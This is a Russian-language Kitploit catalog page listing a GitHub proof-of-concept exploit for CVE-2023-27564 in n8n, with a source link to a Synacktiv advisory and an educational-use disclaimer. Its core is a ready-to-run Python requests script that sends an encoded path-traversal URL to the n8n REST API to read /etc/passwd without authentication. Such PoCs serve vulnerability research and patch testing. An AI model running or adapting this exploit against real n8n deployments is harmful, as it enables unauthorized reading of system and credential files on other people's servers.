Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
exploit-CVE-2023-27564 — Эксплойт PoC для CVE-2023-27564, позволяющий анонимно читать файлы в n8n через path traversal в REST API. Предназначен для исследований безопасности и оценки уязвимостей. | Kitploit
Инструменты/GitHubGitHub/david-botelho-mariano/exploit-cve-2023-27564
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubdavid-botelho-mariano/exploit-cve-2023-27564

exploit-CVE-2023-27564

Эксплойт PoC для CVE-2023-27564, позволяющий анонимно читать файлы в n8n через path traversal в REST API. Предназначен для исследований безопасности и оценки уязвимостей.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
2 лет назадЕщё не проверено

Эксплойт для CVE-2023-27564

Эта уязвимость позволяет анонимно читать файлы в n8n.

root@kitploit:~
import requests

url = "https://example.com/rest/data/filesystem:..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd:.svg"

response = requests.get(url)

print(response.status_code)
print(response.headers)
print(response.text)

Источник

https://www.synacktiv.com/sites/default/files/2023-05/Synacktiv-N8N-Multiple-Vulnerabilities_0.pdf

Отказ от ответственности

Доказательство концепции (PoC), представленное в этом репозитории, предназначено только для образовательных целей и исследований в области безопасности. Информация и код предназначены для использования специалистами по кибербезопасности и исследователями для понимания и защиты от уязвимостей в программном обеспечении и системах. Любое использование данного PoC, связанной информации или кода для атак на цели без предварительного взаимного согласия является незаконным и строго запрещено.

Используя данный PoC, вы соглашаетесь с тем, что понимаете потенциальное воздействие уязвимости, которую он демонстрирует, и будете использовать его ответственно и этично. Авторы данного PoC отказываются от любой ответственности за любое неправильное использование этого материала или за любой ущерб, который может возникнуть в результате использования предоставленной информации и кода. Конечный пользователь обязан соблюдать все применимые местные, государственные, национальные и международные законы.

Авторы предприняли все усилия для обеспечения точности и надежности информации, представленной в этом репозитории. Однако информация предоставляется "как есть" без каких-либо гарантий. Авторы не принимают на себя никакой ответственности за точность, содержание, полноту, законность или надежность содержащейся информации.

Скачать инструмент